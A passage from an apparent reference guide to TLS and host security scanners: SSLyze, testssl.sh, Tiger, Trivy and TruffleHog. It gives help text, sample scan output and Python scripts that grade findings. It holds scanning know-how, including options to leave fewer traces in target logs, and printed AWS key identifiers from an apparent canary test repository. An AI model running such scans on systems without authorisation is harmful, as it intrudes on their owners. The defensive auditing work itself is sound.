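LEGACY_PROTOCOLS = {"SSLv2": "HIGH", "SSLv3": "HIGH", "TLSv1.0": "MEDIUM", "TLSv1.1": "MEDIUM"}


def parse_sslscan(text):
    """Extract the protocol table, cipher lines, certificate fields and boolean flags."""
    report = {"protocols": {}, "ciphers": [], "cert": {}, "flags": set()}
    for raw in text.splitlines():
        line = " ".join(raw.split())  # collapse sslscan's column padding
        if m := PROTO_RE.match(line):
            report["protocols"][m.group(1)] = m.group(2) == "enabled"
        elif m := CIPHER_RE.match(line):
            report["ciphers"].append({"proto": m.group(2), "bits": int(m.group(3)), "name": m.group(4)})
        elif m := CERT_RE.match(line):
            report["cert"][m.group(1)] = m.group(2)
        # The negative-case wording below is assumed; the run above shows only the good cases.
        elif "does not support TLS Fallback SCSV" in line:
            report["flags"].add("no_fallback_scsv")
        elif line.startswith("Compression enabled"):
            report["flags"].add("compression")
        elif "vulnerable to heartbleed" in line and "not vulnerable" not in line:
            report["flags"].add("heartbleed")
    return report


def has_forward_secrecy(name):
    """TLS 1.3 suites (TLS_*) are always ephemeral; TLS 1.2 OpenSSL names say ECDHE/DHE."""
    return name.startswith(("TLS_", "ECDHE-", "DHE-"))


def findings(report, now=SCAN_DATE, expiry_warn_days=30):
    """Grade the parsed report into (severity, message) pairs; `now` is injected for reproducibility."""
    out = []
    for proto, severity in LEGACY_PROTOCOLS.items():
        if report["protocols"].get(proto):
            out.append((severity, f"legacy protocol {proto} enabled"))
    for c in report["ciphers"]:
        if c["bits"] < 128:
            out.append(("HIGH", f"weak cipher {c['name']} ({c['bits']} bits) on {c['proto']}"))
        elif not has_forward_secrecy(c["name"]):
            out.append(("LOW", f"no forward secrecy: {c['name']} on {c['proto']}"))
    cert = report["cert"]
    if cert.get("Signature Algorithm", "").lower().startswith(("sha1", "md5")):
        out.append(("HIGH", f"weak certificate signature {cert['Signature Algorithm']}"))
    if int(cert.get("RSA Key Strength", 4096)) < 2048:
        out.append(("HIGH", f"RSA key too small: {cert['RSA Key Strength']} bits"))
    if expires := cert.get("Not valid after"):
        not_after = datetime.strptime(expires, "%b %d %H:%M:%S %Y GMT")
        if not_after < now:
            out.append(("HIGH", f"certificate expired on {not_after:%Y-%m-%d}"))
        elif not_after - now < timedelta(days=expiry_warn_days):
            out.append(("MEDIUM", f"certificate expires on {not_after:%Y-%m-%d}"))
    flag_messages = {
        "compression": ("HIGH", "TLS compression enabled (CRIME)"),
        "heartbleed": ("CRITICAL", "vulnerable to Heartbleed (CVE-2014-0160)"),
        "no_fallback_scsv": ("MEDIUM", "TLS Fallback SCSV not supported"),
    }
    out.extend(flag_messages[flag] for flag in sorted(report["flags"]))
    return out


if __name__ == "__main__":
    for severity, message in findings(parse_sslscan(SAMPLE_OUTPUT)):
        print(f"[{severity}] {message}")
```

Pipe a real run through it with `sslscan --no-colour host | python3 this_script.py` after swapping SAMPLE_OUTPUT for `sys.stdin.read()`; the `now` parameter exists so the expiry check can be pinned in tests.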
SSLyze
Analyzes a server's SSL/TLS configuration.
■ Usage
root@kali:~# sslyze --help
usage: sslyze [-h] [--update_trust_stores] [--cert CERTIFICATE_FILE] [--key KEY_FILE] [--keyform KEY_FORMAT] [--pass PASSPHRASE]
[--json_out JSON_FILE] [--targets_in TARGET_FILE] [--quiet] [--slow_connection] [--https_tunnel PROXY_SETTINGS]
[--starttls PROTOCOL] [--xmpp_to HOSTNAME] [--sni SERVER_NAME_INDICATION] [--sslv3] [--tlsv1_2] [--compression] [--tlsv1]
[--tlsv1_3] [--early_data] [--http_headers] [--resum] [--resum_attempts RESUM_ATTEMPTS] [--elliptic_curves] [--sslv2] [--reneg]
[--certinfo] [--certinfo_ca_file CERTINFO_CA_FILE] [--heartbleed] [--robot] [--openssl_ccs] [--fallback] [--tlsv1_1]
[--mozilla_config {modern,intermediate,old,disable}]
[target ...]
positional arguments:
target The list of servers to scan.
options:
-h, --help show this help message and exit
--mozilla_config {modern,intermediate,old,disable}
Shortcut to queue various scan commands needed to check the server's TLS configurations against one of Mozilla's
recommended TLS configuration. Set to "intermediate" by default. Use "disable" to disable this check.
Trust stores options:
--update_trust_stores
Update the default trust stores used by SSLyze. The latest stores will be downloaded from
https://github.com/nabla-c0d3/trust_stores_observatory. This option is meant to be used separately, and will silence
any other command line option supplied to SSLyze.
Client certificate options:
--cert CERTIFICATE_FILE
Client certificate chain filename. The certificates must be in PEM format and must be sorted starting with the
subject's client certificate, followed by intermediate CA certificates if applicable.
--key KEY_FILE Client private key filename.
--keyform KEY_FORMAT Client private key format. DER or PEM (default).
--pass PASSPHRASE Client private key passphrase.
Input and output options:
--json_out JSON_FILE Write the scan results as a JSON document to the file JSON_FILE. If JSON_FILE is set to '-', the JSON output will
instead be printed to stdout. The resulting JSON file is a serialized version of the ScanResult objects described in
SSLyze's Python API: the nodes and attributes will be the same. See
https://nabla-c0d3.github.io/sslyze/documentation/available-scan-commands.html for more details.
--targets_in TARGET_FILE
Read the list of targets to scan from the file TARGET_FILE. It should contain one host:port per line.
--quiet Do not output anything to stdout; useful when using --json_out.
Contectivity options:
--slow_connection Greatly reduce the number of concurrent connections initiated by SSLyze. This will make the scans slower but more
reliable if the connection between your host and the server is slow, or if the server cannot handle many concurrent
connections. Enable this option if you are getting a lot of timeouts or errors.
--https_tunnel PROXY_SETTINGS
Tunnel all traffic to the target server(s) through an HTTP CONNECT proxy. HTTP_TUNNEL should be the proxy's URL:
'http://USER:PW@HOST:PORT/'. For proxies requiring authentication, only Basic Authentication is supported.
--starttls PROTOCOL Perform a StartTLS handshake when connecting to the target server(s). StartTLS should be one of: auto, smtp, xmpp,
xmpp_server, pop3, imap, ftp, ldap, rdp, postgres. The 'auto' option will cause SSLyze to deduce the protocol (ftp,
imap, etc.) from the supplied port number, for each target servers.
--xmpp_to HOSTNAME Optional setting for STARTTLS XMPP. XMPP_TO should be the hostname to be put in the 'to' attribute of the XMPP stream.
Default is the server's hostname.
--sni SERVER_NAME_INDICATION
Use Server Name Indication to specify the hostname to connect to. Will only affect TLS 1.0+ connections.
Scan commands:
--sslv3 Test a server for SSL 3.0 support.
--tlsv1_2 Test a server for TLS 1.2 support.
--compression Test a server for TLS compression support, which can be leveraged to perform a CRIME attack.
--tlsv1 Test a server for TLS 1.0 support.
--tlsv1_3 Test a server for TLS 1.3 support.
--early_data Test a server for TLS 1.3 early data support.
--http_headers Test a server for the presence of security-related HTTP headers.
--resum Test a server for TLS 1.2 session resumption support using session IDs and TLS tickets.
--resum_attempts RESUM_ATTEMPTS
To be used with --resum. Number of session resumptions (both with Session IDs and TLS Tickets) that SSLyze should
attempt. The default value is 5, but a higher value such as 100 can be used to get a more accurate measure of how
often session resumption succeeds or fails with the server.
--elliptic_curves Test a server for supported elliptic curves.
--sslv2 Test a server for SSL 2.0 support.
--reneg Test a server for for insecure TLS renegotiation and client-initiated renegotiation.
--certinfo Retrieve and analyze a server's certificate(s) to verify its validity.
--certinfo_ca_file CERTINFO_CA_FILE
To be used with --certinfo. Path to a file containing root certificates in PEM format that will be used to verify the
validity of the server's certificate.
--heartbleed Test a server for the OpenSSL Heartbleed vulnerability.
--robot Test a server for the ROBOT vulnerability.
--openssl_ccs Test a server for the OpenSSL CCS Injection vulnerability (CVE-2014-0224).
--fallback Test a server for the TLS_FALLBACK_SCSV mechanism to prevent downgrade attacks.
--tlsv1_1 Test a server for TLS 1.1 support.
■ Example
root@kali:~# sslyze example.com
SCAN RESULTS FOR EXAMPLE.COM:443 - 93.184.215.14
------------------------------------------------
* Certificates Information:
Hostname sent for SNI: example.com
Number of certificates detected: 1
Certificate #0 ( RSAPublicKey )
SHA1 Fingerprint: 4da25a6d5ef62c5f95c7bd0a73ea3c177b36999d
Common Name: www.example.org
Issuer: DigiCert Global G2 TLS RSA SHA256 2020 CA1
Serial Number: 9781292415466404211737309641897402759
Not Before: 2024-01-30
Not After: 2025-03-01
Public Key Algorithm: RSAPublicKey
Signature Algorithm: sha256
Key Size: 2048
Exponent: 65537
SubjAltName - DNS Names: ['www.example.org', 'example.net', 'example.edu', 'example.com', 'example.org', 'www.example.com', 'www.example.edu', 'www.example.net']
Certificate #0 - Trust
Android CA Store (14.0.0_r9): OK - Certificate is trusted
Apple CA Store (iOS 17, iPadOS 17, macOS 14, tvOS 17, and watchOS 10):OK - Certificate is trusted
Java CA Store (jdk-13.0.2): OK - Certificate is trusted
Mozilla CA Store (2024-02-04): OK - Certificate is trusted
Windows CA Store (2023-12-11): OK - Certificate is trusted
Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
Received Chain: www.example.org --> DigiCert Global G2 TLS RSA SHA256 2020 CA1
Verified Chain: www.example.org --> DigiCert Global G2 TLS RSA SHA256 2020 CA1 --> DigiCert Global Root G2
Received Chain Contains Anchor: OK - Anchor certificate not sent
Received Chain Order: OK - Order is valid
Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
[...]
* TLS 1.3 Cipher Suites:
Attempted to connect using 5 cipher suites.
The server accepted the following 3 cipher suites:
TLS_CHACHA20_POLY1305_SHA256 256 ECDH: prime256v1 (256 bits)
TLS_AES_256_GCM_SHA384 256 ECDH: prime256v1 (256 bits)
TLS_AES_128_GCM_SHA256 128 ECDH: prime256v1 (256 bits)
* Deflate Compression:
OK - Compression disabled
* OpenSSL CCS Injection:
OK - Not vulnerable to OpenSSL CCS injection
* OpenSSL Heartbleed:
OK - Not vulnerable to Heartbleed
* ROBOT Attack:
OK - Not vulnerable.
* Session Renegotiation:
Client Renegotiation DoS Attack: OK - Not vulnerable
Secure Renegotiation: OK - Supported
testssl.sh
Performs a wide range of SSL checks, including TLS/SSL ciphers, protocols, and support for vulnerable cipher suites.
■ Usage
root@kali:~# testssl --help
"testssl [options] <URI>" or "testssl <options>"
"testssl <option>", where <option> is mostly standalone and one of:
--help what you're looking at
-b, --banner displays banner + version of testssl
-v, --version same as previous
-V, --local [pattern] pretty print all local ciphers (of openssl only). If search pattern supplied: it is an
an ignore case word pattern of cipher hexcode or any other string in its name, kx or bits
"testssl [options] <URI>", where <URI> is:
<URI> host|host:port|URL|URL:port port 443 is default, URL can only contain HTTPS as a protocol
and [options] is/are:
-t, --starttls <protocol> Does a run against a STARTTLS enabled service which is one of ftp, smtp, lmtp, pop3, imap,
sieve, xmpp, xmpp-server, telnet, ldap, nntp, postgres, mysql
--xmpphost <to_domain> For STARTTLS xmpp or xmpp-server checks it supplies the domainname (like SNI)
--mx <domain/host> Tests MX records from high to low priority (STARTTLS, port 25)
--file/-iL <fname> Mass testing option: Reads one testssl.sh command line per line from <fname>.
Can be combined with --serial or --parallel. Implicitly turns on "--warnings batch".
Text format 1: Comments via # allowed, EOF signals end of <fname>
Text format 2: nmap output in greppable format (-oG), 1 port per line allowed
--mode <serial|parallel> Mass testing to be done serial (default) or parallel (--parallel is shortcut for the latter)
--warnings <batch|off> "batch" doesn't continue when a testing error is encountered, off continues and skips warnings
--connect-timeout <seconds> useful to avoid hangers. Max <seconds> to wait for the TCP socket connect to return
--openssl-timeout <seconds> useful to avoid hangers. Max <seconds> to wait before openssl connect will be terminated
single check as <options> ("testssl URI" does everything except -E and -g):
-e, --each-cipher checks each local cipher remotely
-E, --cipher-per-proto checks those per protocol
-s, --std, --categories tests standard cipher categories by strength
-f, --fs, --nsa checks forward secrecy settings
-p, --protocols checks TLS/SSL protocols (including SPDY/HTTP2)
-g, --grease tests several server implementation bugs like GREASE and size limitations
-S, --server-defaults displays the server's default picks and certificate info
-P, --server-preference displays the server's picks: protocol+cipher
-x, --single-cipher <pattern> tests matched <pattern> of ciphers
(if <pattern> not a number: word match)
-c, --client-simulation test client simulations, see which client negotiates with cipher and protocol
-h, --header, --headers tests HSTS, HPKP, server/app banner, security headers, cookie, reverse proxy, IPv4 address
-U, --vulnerable tests all (of the following) vulnerabilities (if applicable)
-H, --heartbleed tests for Heartbleed vulnerability
-I, --ccs, --ccs-injection tests for CCS injection vulnerability
-T, --ticketbleed tests for Ticketbleed vulnerability in BigIP loadbalancers
--BB, --robot tests for Return of Bleichenbacher's Oracle Threat (ROBOT) vulnerability
--SI, --starttls-injection tests for STARTTLS injection issues
-R, --renegotiation tests for renegotiation vulnerabilities
-C, --compression, --crime tests for CRIME vulnerability (TLS compression issue)
-B, --breach tests for BREACH vulnerability (HTTP compression issue)
-O, --poodle tests for POODLE (SSL) vulnerability
-Z, --tls-fallback checks TLS_FALLBACK_SCSV mitigation
-W, --sweet32 tests 64 bit block ciphers (3DES, RC2 and IDEA): SWEET32 vulnerability
-A, --beast tests for BEAST vulnerability
-L, --lucky13 tests for LUCKY13
-WS, --winshock tests for winshock vulnerability
-F, --freak tests for FREAK vulnerability
-J, --logjam tests for LOGJAM vulnerability
-D, --drown tests for DROWN vulnerability
-4, --rc4, --appelbaum which RC4 ciphers are being offered?
tuning / connect options (most also can be preset via environment variables):
-9, --full includes tests for implementation bugs and cipher per protocol (could disappear)
--bugs enables the "-bugs" option of s_client, needed e.g. for some buggy F5s
--assume-http if protocol check fails it assumes HTTP protocol and enforces HTTP checks
--ssl-native use OpenSSL where sockets are normally used. Faster but inaccurate, avoid it if possible
--openssl <PATH> use this openssl binary (default: look in $PATH, $RUN_DIR of testssl)
--proxy <host:port|auto> (experimental) proxy connects via <host:port>, auto: values from $env ($http(s)_proxy)
-6 also use IPv6. Works only with supporting OpenSSL version and IPv6 connectivity
--ip <ip> a) tests the supplied <ip> v4 or v6 address instead of resolving host(s) in URI
b) "one" means: just test the first DNS returns (useful for multiple IPs)
c) "proxy" means: dns resolution via proxy. Needed when host has no DNS.
-n, --nodns <min|none> if "none": do not try any DNS lookups, "min" queries A, AAAA and MX records
--sneaky leave less traces in target logs: user agent, referer
--user-agent <user agent> set a custom user agent instead of the standard user agent
--ids-friendly skips a few vulnerability checks which may cause IDSs to block the scanning IP
--phone-out allow to contact external servers for CRL download and querying OCSP responder
--add-ca <CA files|CA dir> path to <CAdir> with *.pem or a comma separated list of CA files to include in trust check
--basicauth <user:pass> provide HTTP basic auth information.
--reqheader <header> add custom http request headers
output options (can also be preset via environment variables):
--quiet don't output the banner. By doing this you acknowledge usage terms normally appearing in the banner
--wide wide output for tests like RC4, BEAST. FS also with hexcode, kx, strength, RFC name
--show-each for wide outputs: display all ciphers tested -- not only succeeded ones
--mapping <openssl| openssl: use the OpenSSL cipher suite name as the primary name cipher suite name form (default)
iana|rfc -> use the IANA/(RFC) cipher suite name as the primary name cipher suite name form
no-openssl| -> don't display the OpenSSL cipher suite name, display IANA/(RFC) names only
no-iana|no-rfc> -> don't display the IANA/(RFC) cipher suite name, display OpenSSL names only
--color <0|1|2|3> 0: no escape or other codes, 1: b/w escape codes, 2: color (default), 3: extra color (color all ciphers)
--colorblind swap green and blue in the output
--debug <0-6> 1: screen output normal but keeps debug output in /tmp/. 2-6: see "grep -A 5 '^DEBUG=' testssl.sh"
--disable-rating Explicitly disables the rating output
file output options (can also be preset via environment variables)
--log, --logging logs stdout to '${NODE}-p${port}${YYYYMMDD-HHMM}.log' in current working directory (cwd)
--logfile|-oL <logfile> logs stdout to 'dir/${NODE}-p${port}${YYYYMMDD-HHMM}.log'. If 'logfile' is a dir or to a specified 'logfile'
--json additional output of findings to flat JSON file '${NODE}-p${port}${YYYYMMDD-HHMM}.json' in cwd
--jsonfile|-oj <jsonfile> additional output to the specified flat JSON file or directory, similar to --logfile
--json-pretty additional JSON structured output of findings to a file '${NODE}-p${port}${YYYYMMDD-HHMM}.json' in cwd
--jsonfile-pretty|-oJ <jsonfile> additional JSON structured output to the specified file or directory, similar to --logfile
--csv additional output of findings to CSV file '${NODE}-p${port}${YYYYMMDD-HHMM}.csv' in cwd or directory
--csvfile|-oC <csvfile> additional output as CSV to the specified file or directory, similar to --logfile
--html additional output as HTML to file '${NODE}-p${port}${YYYYMMDD-HHMM}.html'
--htmlfile|-oH <htmlfile> additional output as HTML to the specified file or directory, similar to --logfile
--out(f,F)ile|-oa/-oA <fname> log to a LOG,JSON,CSV,HTML file (see nmap). -oA/-oa: pretty/flat JSON.
"auto" uses '${NODE}-p${port}${YYYYMMDD-HHMM}'. If fname if a dir uses 'dir/${NODE}-p${port}${YYYYMMDD-HHMM}'
--hints additional hints to findings
--severity <severity> severities with lower level will be filtered for CSV+JSON, possible values <LOW|MEDIUM|HIGH|CRITICAL>
--append if (non-empty) <logfile>, <csvfile>, <jsonfile> or <htmlfile> exists, append to file. Omits any header
--overwrite if <logfile>, <csvfile>, <jsonfile> or <htmlfile> exists it overwrites it without any warning
--outprefix <fname_prefix> before '${NODE}.' above prepend <fname_prefix>
■ Example
root@kali:~# testssl --ip one xxxx.go.jp
Testing protocols via sockets except NPN+ALPN
SSLv2 not offered (OK)
SSLv3 not offered (OK)
TLS 1 not offered
TLS 1.1 not offered
TLS 1.2 offered (OK)
TLS 1.3 offered (OK): final
NPN/SPDY not offered
ALPN/HTTP2 not offered
Testing cipher categories
NULL ciphers (no encryption) not offered (OK)
Anonymous NULL Ciphers (no authentication) not offered (OK)
Export ciphers (w/o ADH+NULL) not offered (OK)
LOW: 64 Bit + DES, RC[2,4], MD5 (w/o export) not offered (OK)
Triple DES Ciphers / IDEA not offered
Obsoleted CBC ciphers (AES, ARIA etc.) offered
[...]
Testing vulnerabilities
Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
CCS (CVE-2014-0224) not vulnerable (OK)
Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
ROBOT not vulnerable (OK)
Secure Renegotiation (RFC 5746) supported (OK)
Secure Client-Initiated Renegotiation likely not vulnerable (OK), timed out
CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
BREACH (CVE-2013-3587) no gzip/deflate/compress/br HTTP compression (OK) - only supplied "/" tested
POODLE, SSL (CVE-2014-3566) not vulnerable (OK), no SSLv3 support
TLS_FALLBACK_SCSV (RFC 7507) No fallback possible (OK), no protocol below TLS 1.2 offered
SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
FREAK (CVE-2015-0204) not vulnerable (OK)
DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
make sure you don't use this certificate elsewhere with SSLv2 enabled services, see
https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=4D8B3E530422123AED9839920C8F5AA19CC2C9FD16033D74CB402E64E70FD8E9
LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected with <= TLS 1.2
BEAST (CVE-2011-3389) not vulnerable (OK), no SSL3 or TLS1
LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches
Winshock (CVE-2014-6321), experimental not vulnerable (OK)
RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
[...]
Rating (experimental)
Rating specs (not complete) SSL Labs's 'SSL Server Rating Guide' (version 2009q from 2020-01-30)
Specification documentation https://github.com/ssllabs/research/wiki/SSL-Server-Rating-Guide
Protocol Support (weighted) 100 (30)
Key Exchange (weighted) 90 (27)
Cipher Strength (weighted) 90 (36)
Final Score 93
Overall Grade A
Grade cap reasons Grade capped to A. HSTS is not offered
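The `--jsonfile` and `--severity` options listed above write a flat JSON file and drop findings below a given level. The script below is an added example (not part of testssl.sh or of this article) that applies the same threshold to such a file, summarises what remains and returns a pipeline exit code; the record layout (`id`, `ip`, `port`, `severity`, `finding`, `cve`) follows testssl.sh's flat JSON as far as I know it and is an assumption here, and the records are constructed to mirror the run shown above.

```python
import json

# Severity levels in testssl.sh flat JSON, lowest to highest. Assumption: this
# ordering extends the <LOW|MEDIUM|HIGH|CRITICAL> values listed for --severity.
LEVELS = ["DEBUG", "INFO", "OK", "LOW", "MEDIUM", "HIGH", "CRITICAL"]
RANK = {name: i for i, name in enumerate(LEVELS)}

# Constructed sample of a flat JSON file (not real output), mirroring the run above.
SAMPLE_FLAT_JSON = json.dumps([
    {"id": "TLS1_2", "ip": "xxxx.go.jp/192.0.2.10", "port": "443",
     "severity": "OK", "finding": "offered"},
    {"id": "heartbleed", "ip": "xxxx.go.jp/192.0.2.10", "port": "443",
     "severity": "OK", "cve": "CVE-2014-0160", "cwe": "CWE-119",
     "finding": "not vulnerable, no heartbeat extension"},
    {"id": "LUCKY13", "ip": "xxxx.go.jp/192.0.2.10", "port": "443",
     "severity": "LOW", "cve": "CVE-2013-0169", "cwe": "CWE-310",
     "finding": "potentially vulnerable, uses TLS CBC ciphers"},
    {"id": "HSTS", "ip": "xxxx.go.jp/192.0.2.10", "port": "443",
     "severity": "LOW", "finding": "not offered"},
    {"id": "cipherlist_OBSOLETED", "ip": "xxxx.go.jp/192.0.2.10", "port": "443",
     "severity": "LOW", "finding": "offered"},
])

def filter_findings(flat_json_text, minimum="LOW"):
    """Keep findings at or above `minimum`, the way --severity filters CSV/JSON.
    Unknown severity strings are treated as DEBUG and therefore dropped."""
    if minimum not in RANK:
        raise ValueError(f"unknown severity {minimum!r}; expected one of {LEVELS}")
    findings = json.loads(flat_json_text)
    return [f for f in findings if RANK.get(f.get("severity"), 0) >= RANK[minimum]]

def summarise(findings):
    """Count findings per severity and list the ids that carry a CVE."""
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    with_cve = sorted(f["id"] for f in findings if "cve" in f)
    return counts, with_cve

def exit_code(findings, fail_on="HIGH"):
    """1 when any finding reaches `fail_on`, so a CI job can gate on the scan."""
    return 1 if any(RANK.get(f.get("severity"), 0) >= RANK[fail_on] for f in findings) else 0

if __name__ == "__main__":
    kept = filter_findings(SAMPLE_FLAT_JSON, "LOW")
    counts, with_cve = summarise(kept)
    print(counts, with_cve, exit_code(kept))
```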
Tiger
Performs a security audit of Unix/Linux servers.
■ Usage
root@kali:~# tiger -h
Usage: ./tiger [-vthqGSH] [-B dir] [-l dir|@host] [-w dir] [-b dir] [-e|-E] [-c config] [-A arch] [-O os] [-R release]
-v Show the Tiger version.
-t Run in test mode.
-h Show usage (this help).
-q Supress messages to be as quiet as possible, only
security messages will be shown.
-B name
Specify the directory where tiger is installed. If
not specified, '/usr/lib/tiger' is used.
-l name
Specify the name of the directory where Tiger will
write the security report. This defaults to
'/var/log/tiger'. The filename of the report will be of
the form 'security.report.host-name.date.time.'
If the directory begins with a @, the name will
be interpreted as a tiger logging server.
-w name
Specify a directory to use for creating scratch
files. This defaults to '/var/lib/tiger/work'.
-b name
Specify the directory which contains (or will con-
tain) the binaries generated from the C modules.
If the systems directories contain all the bina-
ries, they will be used directly from there. If
not, then if the bindir contains the binaries,
these will be used. If none are found in either
place, then an attempt will be made to compile the
C code and install the executables into the bindir.
-c name
Specify an alternate name for the tigerrc control
file. The default is '/etc/tiger/tigerrc'.
-e This option will cause explanations to be inserted
into the security report following each message.
This can greatly increase the size of the report,
as explanations may appear repeatedly.
-E This option indicates that a separate explanation
report should be created, with explanations for
each type of message only appearing once. The
filename of the explanation report will be of the
form 'explain.report.hostname.date.time.'
-G Generate the signatures (MD5 hashes and file permissions)
for system binary files.
-H This option will format the report into HTML creat-
ing local links to the problem descriptions.
-S This option indicates that a surface level check of
the configuration files of any diskless clients
served by this machine should be checked at the
same time. The checks will not be as in depth as
they would be if run on the client itself.
Overrides for values detected by the configuration system:
-A arch
Specify an alternate architecture for tiger
-O os
Specify an alternate operating system for tiger
-R release
Specify an alternate operating system release
for tiger
■ Example
root@kali:~# tiger
03:44> Beginning security report for kali_2.
03:44> Starting file systems scans in background...
03:44> Checking password files...
03:44> Checking group files...
03:44> Checking user accounts...
03:44> Checking .rhosts files...
03:44> Checking .netrc files...
03:44> Checking ttytab, securetty, and login configuration files...
03:44> Checking PATH settings...
03:44> Checking anonymous ftp setup...
03:44> Checking mail aliases...
03:44> Checking cron entries...
[...]
Security report is in `/var/log/tiger/security.report.kali.241125-03:44'.
root@kali:~# cat /var/log/tiger/security.report.kali.241125-03:44
# Performing check of passwd files...
# Checking entries from /etc/passwd.
--WARN-- [pass014w] Login (root) is disabled, but has a valid shell.
--WARN-- [pass015w] Login ID sync does not have a valid shell (/bin/sync).
--WARN-- [pass016w] User systemd-network has / as home directory
--WARN-- [pass016w] User systemd-timesync has / as home directory
--WARN-- [pass012w] Home directory / exists multiple times (2) in /etc/passwd.
[...]
Trivy
Detects vulnerabilities, misconfigurations, secrets and more in filesystems, container images, code repositories, VM images and other targets.
■ Usage
root@kali:~# trivy --help
Usage:
trivy [global flags] command [flags] target
trivy [command]
Scanning Commands
config Scan config files for misconfigurations
filesystem Scan local filesystem
image Scan a container image
kubernetes [EXPERIMENTAL] Scan kubernetes cluster
repository Scan a repository
rootfs Scan rootfs
sbom Scan SBOM for vulnerabilities and licenses
vm [EXPERIMENTAL] Scan a virtual machine image
Management Commands
module Manage modules
plugin Manage plugins
vex [EXPERIMENTAL] VEX utilities
Utility Commands
clean Remove cached files
completion Generate the autocompletion script for the specified shell
convert Convert Trivy JSON report into a different format
help Help about any command
registry Manage registry authentication
server Server mode
version Print the version
Flags:
--cache-dir string cache directory (default "/root/.cache/trivy")
-c, --config string config path (default "trivy.yaml")
-d, --debug debug mode
-f, --format string version format (json)
--generate-default-config write the default config to trivy-default.yaml
-h, --help help for trivy
--insecure allow insecure server connections
-q, --quiet suppress progress bar and log output
--timeout duration timeout (default 5m0s)
-v, --version show version
■ Example
root@kali:~# trivy image sample-app:latest
sample-app:latest (ubuntu 14.04)
Total: 152 (UNKNOWN: 0, LOW: 66, MEDIUM: 80, HIGH: 6, CRITICAL: 0)
┌─────────────┬───────────────┬──────────┬────────┬───────────────────┬────────────────────┬──────────────────────────────────────────────────────────────┐
│   Library   │ Vulnerability │ Severity │ Status │ Installed Version │   Fixed Version    │                            Title                             │
├─────────────┼───────────────┼──────────┼────────┼───────────────────┼────────────────────┼──────────────────────────────────────────────────────────────┤
│ libssl1.0.0 │ CVE-2016-2107 │ HIGH     │ fixed  │ 1.0.1e-2          │ 1.0.1f-1ubuntu2.19 │ openssl: Padding oracle in AES-NI CBC MAC check              │
│             │               │          │        │                   │                    │ https://avd.aquasec.com/nvd/cve-2016-2107                    │
│             ├───────────────┤          │        │                   ├────────────────────┼──────────────────────────────────────────────────────────────┤
[...]
/etc/ssl/private/ssl-cert-snakeoil.key (secrets)
Total: 1 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 1, CRITICAL: 0)
HIGH: AsymmetricPrivateKey (private-key)
════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════
Asymmetric Private Key
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/etc/ssl/private/ssl-cert-snakeoil.key:1 (added by 'RUN /bin/sh -c apt install -y wget curl ')
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[...]
TruffleHog
Detects secrets in many kinds of locations, such as filesystems, container images, code repositories and cloud storage.
■ Usage
root@kali:~# trufflehog --help
usage: TruffleHog [<flags>] <command> [<args> ...]
Flags:
--help Show context-sensitive help (also try --help-long and --help-man).
--debug Run in debug mode.
--trace Run in trace mode.
--profile Enables profiling and sets a pprof and fgprof server on :18066.
-j, --json Output in JSON format.
--json-legacy Use the pre-v3.0 JSON format. Only works with git, gitlab, and github sources.
--github-actions Output in GitHub Actions format.
--concurrency=8 Number of concurrent workers.
--no-verification Don't verify the results.
--only-verified Only output verified results.
--filter-unverified Only output first unverified result per chunk per detector if there are more than one results.
--config=CONFIG Path to configuration file.
--print-avg-detector-time Print the average time spent on each detector.
--no-update Don't check for updates.
--fail Exit with code 183 if results are found.
--verifier=VERIFIER ... Set custom verification endpoints.
--archive-max-size=ARCHIVE-MAX-SIZE
Maximum size of archive to scan. (Byte units eg. 512B, 2KB, 4MB)
--archive-max-depth=ARCHIVE-MAX-DEPTH
Maximum depth of archive to scan.
--archive-timeout=ARCHIVE-TIMEOUT
Maximum time to spend extracting an archive.
--include-detectors="all" Comma separated list of detector types to include. Protobuf name or IDs may be used, as well as ranges.
--exclude-detectors=EXCLUDE-DETECTORS
Comma separated list of detector types to exclude. Protobuf name or IDs may be used, as well as ranges.
IDs defined here take precedence over the include list.
--version Show application version.
Commands:
help [<command>...]
Show help.
git [<flags>] <uri>
Find credentials in git repositories.
github [<flags>]
Find credentials in GitHub repositories.
gitlab --token=TOKEN [<flags>]
Find credentials in GitLab repositories.
filesystem [<flags>] [<path>...]
Find credentials in a filesystem.
s3 [<flags>]
Find credentials in S3 buckets.
gcs [<flags>]
Find credentials in GCS buckets.
syslog [<flags>]
Scan syslog
circleci --token=TOKEN
Scan CircleCI
docker --image=IMAGE
Scan Docker Image
■ Example
# Detect secrets in a GitHub repository, including its issue comments and pull request comments
root@kali:~# trufflehog github --repo=https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
Found verified result 🐷🔑
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAQYLPMN5HHHFPZAM2
Account: 052310077262
User_id: AIDAQYLPMN5HCQD6W5U5W
Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope
Commit: 0416560b1330d8ac42045813251d85c688717eaf
Email: counter <hello@trufflesec.com>
File: new_key
Line: 2
Link: https://github.com/trufflesecurity/test_keys/blob/0416560b1330d8ac42045813251d85c688717eaf/new_key#L2
Repository: https://github.com/trufflesecurity/test_keys.git
Timestamp: 2023-10-19 02:56:37 +0000
[...]
Found verified result 🐷🔑
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAQYLPMN5HLU6OP3FX
Arn: arn:aws:iam::052310077262:user/canarytokens.com@@4y924v19oqbe551caetqhx6pn
Account: 052310077262
User_id: AIDAQYLPMN5HFO4YI7IOF
Line: 1
